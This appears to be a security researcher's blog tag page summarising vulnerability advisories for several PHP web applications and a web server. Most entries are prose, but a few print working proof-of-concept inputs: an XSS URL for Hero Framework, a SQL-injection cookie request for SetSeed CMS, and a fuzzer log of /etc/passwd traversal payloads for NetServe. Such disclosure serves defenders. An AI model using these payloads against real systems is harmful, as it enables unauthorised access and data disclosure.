Posts Tagged ‘ web

Fork CMS 3.2.7 Multiple HTML Code Injection Vulnerabilities

Fork CMS suffers from multiple XSS vulnerabilities when parsing user input to several parameters in different scripts, via POST and GET methods. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5076
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5076.php

webgrind 1.0 (file param) Local File Inclusion Vulnerability

webgrind suffers from a file inlcusion vulnerability (LFI) when input passed thru the ‘file’ parameter to index.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.


---------------------------
/index.php:
-----------
122: case 'fileviewer':
123: $file = get('file');
124: $line = get('line');
---------------------------

Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5075.php

Thanks to Michael Meyer, OpenVAS Project.

Hero Framework 3.69 Remote Reflected Cross-Site Scripting Vulnerability

Hero suffers from a XSS vulnerability when parsing user input to the ‘month’ parameter via GET method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

PoC:

http://localhost/hero_os/events?month=January.htaccess.aspx%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

http://localhost/hero_os/events?month=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5061.php

Manx cms.xml Multiple Vulnerabilities

(XSS) Input thru the GET parameters ‘limit’ and ‘search_folder’ in ‘ajax_get_file_listing.php’ are not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site.

(CRLF Injection/HTTP Response Splitting) Input passed to the POST parameter ‘editorChoice’ in ‘admin_blocks.php’ and ‘admin_pages.php’ and the POST parameter ‘theme’ in ‘admin_css.php’, ‘admin_js.php’ and ‘admin_templates.php’ is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.

(LFI/DT) Input passed via the ‘fileName’ parameter thru the simplexml_load_file() function is not properly verified in ‘/admin/admin_blocks.php’ and ‘/admin/admin_pages.php’ (post-auth) before being used to load files. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks.

Advisories:
ZSL-2011-5058http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5058.php
ZSL-2011-5059http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5059.php
ZSL-2011-5060http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5060.php

:):

SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection Vulnerability

SetSeed CMS is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the vulnerable script using the cookie input ‘loggedInUser’, which could allow the attacker to view, add, modify or delete information in the back-end database.

———
GET /setseed-hub/ HTTP/1.1
Cookie: loggedInKey=PYNS9QVWLEBG1E7C9UFCT674DYNW9YJ; loggedInUser=1%27; PHPSESSID=d6qiobigb5204mkuvculibhgd4
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

HTTP/1.1 200 OK
Date: Wed, 02 Nov 2011 15:39:39 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.8
Content-Length: 150
Keep-Alive: timeout=5, max=62
Connection: Keep-Alive
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near ”1”’ at line 1

———

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5053.php

Toko Lite CMS Multiple XSS POST Injection / CRLF Injection / HTTP Response Splitting

Toko CMS suffers from a XSS vulnerability when parsing user input to the ‘currPath’ and ‘path’ parameters via POST method in ‘editnavbar.php’. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session. Input passed to the ‘charSet’ parameter in ‘edit.php’ is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.

Advisory ID: ZSL-2011-5047
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5047.php
PoC: http://www.zeroscience.mk/codes/tokocms_xss.txt

Advisory ID: ZSL-2011-5048
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php
PoC: http://www.zeroscience.mk/codes/tokocms_crlf.txt

TCExam Multiple Remote Vulnerabilities + Patch

TCExam bellow version 11.2.012 is vulnerable to multiple XSS and SQL Injection attack. Update to version 11.2.012!

TCExam version 11.02.009, 11.2.010 and 11.2.011 tested.

********** Cross-Site Scripting Reflected (script name / parameter(s) / http method) **********

1. /admin/code/tce_colorpicker.php (frm, fld, tag) – GET
2. /admin/code/tce_edit_backup.php (backup_file) – POST
3. /admin/code/tce_edit_group.php (group_name, group_id) – POST
4. /admin/code/tce_edit_module.php (module_id, module_user_id) – POST
5. /admin/code/tce_edit_rating.php (test_id) – POST
6. /admin/code/tce_edit_subject.php (subject_module_id, subject_id) – POST
7. /admin/code/tce_edit_test.php (test_id) – POST
8. /admin/code/tce_filemanager.php (file) – POST
9. /admin/code/tce_select_mediafile.php (frm, fld, file) – GET, GET, POST
10. /admin/code/tce_select_users.php (new_group_id) – POST
11. /admin/code/tce_show_all_questions.php (subject_module_id) – POST
12. /admin/code/tce_show_result_user.php (test_id) – POST
13. /public/code/tce_user_change_email.php (xl_user_email) – POST
14. /public/code/tce_user_change_password.php (xl_newpassword) – POST
15. /public/code/tce_user_registration.php (xl_user_email, xl_newpassword, xl_user_birthdate) – POST

********** Cross-Site Scripting URI Based (script name) **********

1. /admin/code/index.php
2. /admin/code/tce_csv_users.php
3. /admin/code/tce_edit_answer.php
4. /admin/code/tce_edit_backup.php
5. /admin/code/tce_edit_group.php
6. /admin/code/tce_edit_module.php
7. /admin/code/tce_edit_question.php
8. /admin/code/tce_edit_rating.php
9. /admin/code/tce_edit_subject.php
10. /admin/code/tce_edit_test.php
11. /admin/code/tce_edit_user.php
12. /admin/code/tce_filemanager.php
13. /admin/code/tce_import_omr_answers.php
14. /admin/code/tce_import_xml_questions.php
15. /admin/code/tce_import_xml_users.php
16. /admin/code/tce_menu_modules.php
17. /admin/code/tce_menu_tests.php
18. /admin/code/tce_menu_users.php
19. /admin/code/tce_page_info.php
20. /admin/code/tce_select_mediafile.php
21. /admin/code/tce_select_users.php
22. /admin/code/tce_show_all_questions.php
23. /admin/code/tce_show_allresults_users.php
24. /admin/code/tce_show_online_users.php
25. /admin/code/tce_show_result_allusers.php
26. /admin/code/tce_show_result_questions.php
27. /admin/code/tce_show_result_user.php
28. /admin/code/tce_xml_users.php
29. /public/code/index.php
30. /public/code/tce_page_user.php
31. /public/code/tce_user_change_email.php
32. /public/code/tce_user_change_password.php
33. /public/code/tce_user_registration.php

********** Cross-Site Scripting in path (script name) **********

1. /admin/code
2. /public/code

********** SQL Injection (script name / parameter(s) / http method) **********

1. /admin/code/tce_edit_group.php (group_id) – POST
2. /admin/code/tce_edit_module.php (module_id, module_user_id) – POST
3. /admin/code/tce_edit_rating.php (test_id) – POST
4. /admin/code/tce_edit_subject.php (subject_module_id) – POST
5. /admin/code/tce_edit_test.php (test_id) – POST
6. /admin/code/tce_select_users.php (new_group_id) – POST
7. /admin/code/tce_show_all_questions.php (subject_module_id) – POST
8. /admin/code/tce_show_result_questions.php (orderdir, order_field) – POST, GET
9. /admin/code/tce_show_result_user.php (test_id) – POST

********** Possible Cookie Manupulation (script name / parameter(s) / http method) **********

1. /admin/code/tce_edit_group.php (group_id) – POST
2. /public/code/tce_user_registration.php (xl_user_email, xl_newpassword, xl_user_birthdate) – POST

Advisory ZSL-2011-5025: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5025.php
Advisory: ZSL-2011-5026: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5026.php

NetServe Web Server v1.0.58 Multiple Remote Vulnerabilities

NetServe Web Server is vulnerable to multiple vulnerabilities including cross-site scripting, remote file inclusion, local file inclusion, script insertion, html injection, denial of service, etc. Given that the software is not maintained anymore and the last update was in 2006, there are still a few that uses it. All the parameters are susceptible to the above attacks. The list of the parameters used by the web application are(post/get):

– Action
– EnablePasswords
– _Checks
– _ValidationError
– ListIndex
– SiteList_0
– SSIErrorMessage
– SSIExtensions
– SSITimeFormat
– SSIabbrevSize
– EnableSSI
– LogCGIErrors
– LoggingInterval
– ExtendedLogging
– CGITimeOut

The tests were made using PowerFuzzer and OWASP ZAP. Attackers can exploit any of the issues using a web browser.

————snip—————
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=http%3A%2F%2Fwww.google.com%2F&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd%00&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd%00&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd%00&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd%00
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=c%3A%5C%5Cboot.ini&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=c%3A%5C%5Cboot.ini&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
————snip—————

Advisory ID: ZSL-2011-5021
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5021.php

Multiple vulnerabilities in Pacer Edition CMS

Pacer Edition CMS suffers from multiple vulnerabilities including cross-site scripting, local file inclusion and arbitrary file deletion. You can view details of the issues on the following advisory links:

Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit [ZSL-2011-5017]
Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability [ZSL-2011-5018]
Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability [ZSL-2011-5019]

docuFORM Mercury WebApp 6.16a/5.20 Multiple Cross-Site Scripting Vulnerabilities

The Mercury Web Application suffers from multiple XSS vulnerabilities when parsing user input thru the GET parameter ‘this_url’ and the POST parameter ‘aa_sfunc’ in f_state.php, f_list.php, f_job.php and f_header.php scripts. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5010.php